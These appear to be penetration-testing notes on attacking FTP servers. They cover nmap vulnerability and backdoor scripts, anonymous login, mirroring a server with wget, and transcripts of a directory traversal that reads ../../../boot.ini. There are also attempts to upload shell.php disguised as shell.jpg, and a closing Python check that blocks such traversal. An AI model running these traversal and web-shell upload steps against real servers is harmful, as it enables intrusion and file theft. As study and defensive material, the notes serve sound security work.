FTP - 21

NMAP FTP

ls /usr/share/nmap/scripts/ | grep -i ftp

nmap --script ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 192.168.63.93

Anonymous Login

ftp $IP 
username: anonymous

Download all files in a directory

mget *

Download all files from FTP

wget -m ftp://anonymous:anonymous@10.10.10.98 # Download all
wget -m --no-passive ftp://anonymous:anonymous@10.10.10.98 # Download all, without passive mode

Directory traversal: listing above the FTP root

ftp> dir ../
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 .
drw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 ..
-rw-rw-rw-   1 ftp      ftp           48 Nov 01  2010 buy.url
drw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 Configs
-rwxrwxrwx   1 ftp      ftp      1095168 Nov 01  2010 fem.exe
-rw-rw-rw-   1 ftp      ftp         2145 Sep 23  2015 INSTALL.LOG
drw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 Logs
-rw-rw-rw-   1 ftp      ftp        59904 Nov 01  2010 manual.chm
drw-rw-rw-   1 ftp      ftp            0 Sep 23  2015 Shared
-rwxrwxrwx   1 ftp      ftp       148992 Feb 22  1999 UNWISE.EXE
226 File sent ok

FTP upload attempts with put and send

put shell.php shell.jpg
    local: shell.php remote: shell.jpg
    200 Port command successful.
    501 Permission Denied

ftp> send
    (local-file) shell.php
    (remote-file) shell.jpg
    local: shell.php remote: shell.jpg
    200 Port command successful.
    501 Permission Denied

File Download attempts

ftp> GET ../../../boot.ini
?Invalid command
ftp> get ../../../boot.ini
local: ../../../boot.ini remote: ../../../boot.ini
200 Port command successful.
150 Opening data connection for ../../../boot.ini.
226 File sent ok
211 bytes received in 0.00 secs (333.4218 kB/s)
ftp> mget ../../../boot.ini
Filename provided by server doesn't match pattern `../../../boot.ini': /C:/Program Files/Femitter/Shared/../../../boot.ini not found
Refusing to handle insecure file list
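
The dir ../ and get ../../../boot.ini transcripts above succeed because the server resolves the client-supplied path without confining it to the shared directory. As an added example (not from the original notes and not the code of any FTP server), a server-side check in Python that refuses such paths; the function names, the /srv/ftp/Shared root and the choice to refuse rather than clamp at the root are assumptions.

```python
import os
import posixpath

class PathEscapesRoot(Exception):
    """Client-supplied FTP path resolves outside the shared root."""

def normalize_virtual(cwd, requested):
    """Collapse a client path against the virtual cwd, where "/" is the share root."""
    if "\x00" in requested:
        raise PathEscapesRoot("NUL byte in path")
    # A Windows host also accepts "\" as a separator, so fold it into "/" first.
    joined = posixpath.join(cwd, requested.replace("\\", "/"))
    parts = []
    for seg in joined.split("/"):
        if seg in ("", "."):
            continue
        if ":" in seg:  # drive letters (C:) and NTFS alternate data streams
            raise PathEscapesRoot(requested)
        if seg == "..":
            if not parts:  # would climb above the share root: refuse, don't clamp
                raise PathEscapesRoot(requested)
            parts.pop()
        else:
            parts.append(seg)
    return "/" + "/".join(parts)

def to_real_path(root, cwd, requested):
    """Map a virtual path to a filesystem path, re-checking after symlink resolution."""
    virtual = normalize_virtual(cwd, requested)
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, virtual.lstrip("/")))
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise PathEscapesRoot(requested)
    return candidate

def is_allowed(root, cwd, requested):
    """True if the request stays inside root; callers log and refuse the rest."""
    try:
        to_real_path(root, cwd, requested)
        return True
    except PathEscapesRoot:
        return False

if __name__ == "__main__":
    # The first two arguments come from the transcripts; the rest are constructed.
    # /srv/ftp/Shared is an assumed share root.
    for arg in ("../", "../../../boot.ini", "..\\..\\boot.ini", "Configs"):
        print(repr(arg), "->", "ok" if is_allowed("/srv/ftp/Shared", "/", arg) else "refused")
```

The second check in to_real_path matters when the share contains a symlink that points outside it, which string normalization alone cannot see.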
